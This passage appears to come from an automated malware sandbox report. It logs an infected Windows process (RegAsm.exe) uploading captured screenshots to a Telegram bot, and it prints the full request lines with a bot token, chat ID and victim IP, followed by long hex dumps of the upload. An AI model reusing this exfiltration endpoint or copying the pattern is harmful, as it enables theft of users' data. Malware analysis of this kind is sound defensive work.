                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:38:15 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:38:15 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
                                                                            2025-01-09 10:38:15 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:38:15 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
                                                                            2025-01-09 10:38:15 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:38:16 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:38:16 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1828
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.449750149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:38:18 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd3128a6f6645d
                                                                            Host: api.telegram.org
                                                                            Content-Length: 695477
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:38:18 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 32 38 61 36 66 36 36 34 35 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd3128a6f6645dContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:38:18 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
                                                                            2025-01-09 10:38:18 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:38:18 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:38:18 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:38:18 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:38:18 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
                                                                            2025-01-09 10:38:18 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:38:18 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
                                                                            2025-01-09 10:38:18 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:38:19 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:38:19 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1828
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            8192.168.2.449752149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:38:20 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd31468f673866
                                                                            Host: api.telegram.org
                                                                            Content-Length: 687750
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:38:20 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 34 36 38 66 36 37 33 38 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd31468f673866Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:38:20 UTC16355OUTData Raw: 78 92 af 1d 9e dc eb 84 be 00 1c c4 0a 40 4f e2 8d 06 2b f1 2c ef a4 00 04 4f fe 81 27 fd 2c 9e f4 b3 78 82 6f 38 fa 02 b0 4f 9f c1 97 80 e4 02 50 92 6f fc a7 ef 4a 55 7e b9 f8 23 3e 61 d7 bb 0b 62 5f 2f fe d0 31 60 55 04 da 31 6f 03 56 35 a0 04 1e ad 15 76 20 99 97 8f c9 b3 82 0f a1 48 f5 1f 7d bb 17 2d 71 e6 53 ee c2 5b d3 51 df 89 3b dd 91 98 b0 e8 f6 24 02 11 83 b9 00 cc 45 1f a8 02 10 74 ec d7 ce 49 d8 49 00 d2 02 c2 ef 3f 7c fa de ea 88 af f2 90 78 1a 0b ad a1 af ea 41 f2 60 bd 9d ee 4c 7b 69 6f 5a c4 9f c4 a1 95 7e f6 6d c0 aa 04 ac 21 b2 e6 ad ac a4 1f d2 0e 79 27 91 a7 4a 3f 90 f8 cb a5 1f 28 5f 10 2b f6 8a 9f 6f ee f2 24 fa 24 01 25 ff 26 cd a7 ca b0 10 7e 